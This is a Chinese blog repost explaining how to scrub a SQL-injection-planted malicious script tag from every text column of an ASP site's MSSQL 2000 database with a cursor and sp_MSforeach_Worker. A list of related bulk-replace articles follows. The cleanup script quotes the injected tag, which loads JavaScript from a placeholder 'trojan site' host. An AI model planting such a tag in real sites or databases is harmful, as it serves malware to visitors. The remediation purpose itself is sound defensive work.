MSSQL数据库全库批量替换

最新推荐文章于 2022-04-23 19:23:35 发布
最新推荐文章于 2022-04-23 19:23:35 发布
阅读量81 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 数据库
原文链接:http://www.cnblogs.com/wenanry/archive/2009/08/06/1540785.html
一个ASP站点因SQL注入被挂马,通过SQL Server 2000版本的存储过程sp_MSforeach_Worker批量替换恶意代码。介绍了具体的SQL脚本及处理流程。
最近因为某同学以前做的一Asp站点被攻击挂马,所以叫我帮忙检查一下,发现是被SQL注入所致.这些坏人把数据库文本型的字段都加了一段js调用的代码.
于是需要批量替换掉,可以用游标的系统存储过程 sp_MSforeach_Worker 处理
批处理SQL脚本如下
DECLARE @fieldtype sysname
SET @fieldtype='nvarchar'
-- @filedtype 的值可以为 varchar 和 nvarchar 
-- 西狐注
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
    +N' set  '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script src=http://木马网站/0.js></script>'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id 
    AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
    AND c.xusertype=t.xusertype
    AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'
此同学的MSSQL数据为2000版本.其它版本未做过测试

哎顺便感叹一下那些挂木马的大哥们怎么这么没有人道啊.

转载于:https://www.cnblogs.com/wenanry/archive/2009/08/06/1540785.html

SQL中批量替换数据:REPLACE()、JSON_REPLACE()
海蒂
04-23 8071
文本编辑器中有批量替换的功能,那么SQL中也可以实现批量替换数据,以下两个函数: - REPLACE() - JSON_REPLACE()
sql数据库文本批量替换
09-18
快速替换SQL数据库中所有表中的数据 输入你要查询的某一个字符串,然后替换为你想要的字符串(可以为空)
MSSQL批量替换语句 在SQL SERVER中批量替换字符串的方法
09-11
SQL SERVER中批量替换字符串的方法
SQL 一次性替换数据库中所有表或者所有列中的关键字
10-13
包含SQLserver数据库的两个存储过程的完全代码,该存储存储可以一次性替换数据库中所有表或者所有列中的关键字,并介绍其使用方法。本存储过程在我单位更名时起到重要作用。
利用sql语句进行数据库批量替换
狂徒技术分享
05-19 1005
批量替换数据库中某个字段的值 使用sql的update命令替换所有的: update '数据表' set '字段名字'=数值1 where '字段'=数值2;  替换指定值的:update '数据表' set '字段名字'=REPLACE(字段,'数值1','数值2'); 其中数值1为 需要替换的数值    数值2为你替换后的数值...
数据库字符串批量替换工具ASP版
05-17
内容索引:ASP源码,其它类别,批量替换,字符串 数据库字串批量替换工具,运行于ASP平台,支持MSSQL和ACCESS两种数据库。使用这个工具,可以将数据库内指定的字符串替换掉,比如含有病毒的代码等。
C# MSSQL数据库.zip
10-27
这个"C# MSSQL数据库.zip"压缩包包含了使用C#与MSSQL数据库交互的实际项目示例源码,已经经过测试,可以正常运行。 首先,让我们详细了解一下如何在C#中与MSSQL数据库进行连接。C#提供了System.Data.SqlClient命名...
ASP平台数据库字符串批量替换工具发布
资源摘要信息:"数据库字符串批量替换工具ASP版" 一、ASP源码概述 ASP(Active Server Pages)是一种服务器端脚本环境,用于创建动态交互式网页。ASP代码运行在服务器上,生成HTML内容发送给客户端浏览器。ASP允许...
mysql boolean_《关于MySQL的一些骚操作》
weixin_39677419的博客
11-28 121
概要回顾以前写的项目,发现在规范的时候,还是可以做点骚操作的。假使以后还有新的项目用到了MySQL,那么肯定是要实践一番的。为了准备,创建测试数据表(建表语句中默认使用utf8mb4以及utf8mb4_unicode_ci,感兴趣的读者可以自行搜索这两个配置):CREATE TABLE `student` ( `id` int(11) unsigned NOT NULL AUTO_INCREME...
msyql数据批量替换方法:replace
txun123的博客
04-23 1544
有时我们在数据插入之后,会发现数据有问题,这个时候一般有两种解决办法,一种就是通过程序批量修改,一种就是通过mysql直接进行数据的替换。 下面介绍批量替换方法: replace replace(object,search,replace) repalce是mysql提供的默认字符串处理函数,根据函数定义,我们只需要传入对应参数即可。 insert into `test` set name = 'menghuiguli-666'; update `test` set name = repalce
SQLServer数据库查找替换工具
11-15
本软件可根据SQL设定自动检索所有数据表和文本字段值, 并对指定字符进行批量替换.设计之初主要解决数据库被黑客攻击,在数据库中置入大量的JS脚本,造成网页无法正常显示使用.手工用SQL 语句逐一字段清除相当费劲,用本软件可以快速解决,清除数据库中的 脚本木马!
SQLServer 数据库批量查找替换工具1.2 SQL木马清除助手.zip
07-11
本软件可根据SQL设定自动检索所有数据表和文本字段值, 并对指定字符进行批量替换.设计之初主要解决数据库被黑客攻击,在数据库中置入大量的JS脚本,造成网页无法正常显示使用.手工用SQL 语句逐一字段清除相当费劲,用本软件可以快速解决,清除数据库中的 脚本木马!助站长们一臂之力! 测试后发现 可能因为网页内容比较大,可能大于8000所有不能实现替换,也搜索不到,如果对于内容字节稍小的,可能问题不大,喜欢的朋友可以参考下。 
字符串和输入输出缓冲区
weixin_51420051的博客
10-30 655
字符串 ​ 字符:在计算机中字符是以整数形式存在的,当需要使用时会根据ASCLL码表中的对应关系来显示相应的符号或图案 ​ 0 ‘\0’ ​ 48 ‘0’ ​ 65 ‘A’ ​ 97 ‘a’ ​ 串: 一种数据结构,由一组连续的若干个相同类型的数据组成。 ​ 末尾有一个结束标志。 ​ 对于串行结构的处理都是批量性的,从开头位置直到遇到了结束标志停止。 ​ 字符串:由字符组成的串型结构,由’\0’结尾 ​ 字符串的输入 ​ scanf %s 地址 ​ 缺点:不接收空格
MSSQL批量替换语句 在SQL SERVER中批量修改替换数据
weixin_30614587的博客
06-17 303
方法一:(这种是最常用的,因为很多大段的内容都使用text ntext等数据类型,而我们通常也是替换里面的内容) varchar和nvarchar类型是支持replace,所以如果你的text不超过8000可以先转换成前面两种类型再使用replace 替换 text ntext 数据类型字段的语句 复制代码 代码如下: update 表名 set 字段名=replace(cast...
MSSQL 批量修改方式
windowsliusheng的专栏
06-26 1339
UPDATE A SET A.Msg=A.ID FROM A inner JOIN (VALUES('10','234'),       ('20','3453'),    ('30','34534') ) B(ID,PO) ON A.ID=B.ID
【mysql】MYSQL中批量替换某个字段的部分数据
小马哥93的博客
09-14 4万+
MYSQL中批量替换某个字段的部分数据   1.修改字段里的所有含有指定字符串的文字 UPDATE 表A SET 字段B = replace(字段B, 'aaa', 'bbb')     example: update  table set url= replace(url, 'aaa', 'bbb')  【将url字段中的aaa批量更改为bbb】      update table  ...
MySQL批量修改数据
热门推荐
JustryDeng
10-15 4万+
注:之前写批量修改,都是先将数据查询出来之后,再进行批量修改,如: UPDATE `xuer_info` SET userlevel = ( CASE id WHEN 1 THEN '低级' WHEN 2 THEN '中级' WHEN 3 THEN '...
C#开发SQL数据库批量替换工具使用指南
描述中提到该工具专门针对的是MSSQL数据库进行批量替换操作。MSSQL指的是Microsoft SQL Server,是一种广泛使用的商业关系型数据库管理系统,由微软开发。它支持T-SQL(Transact-SQL)作为其数据库查询语言,该语言...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值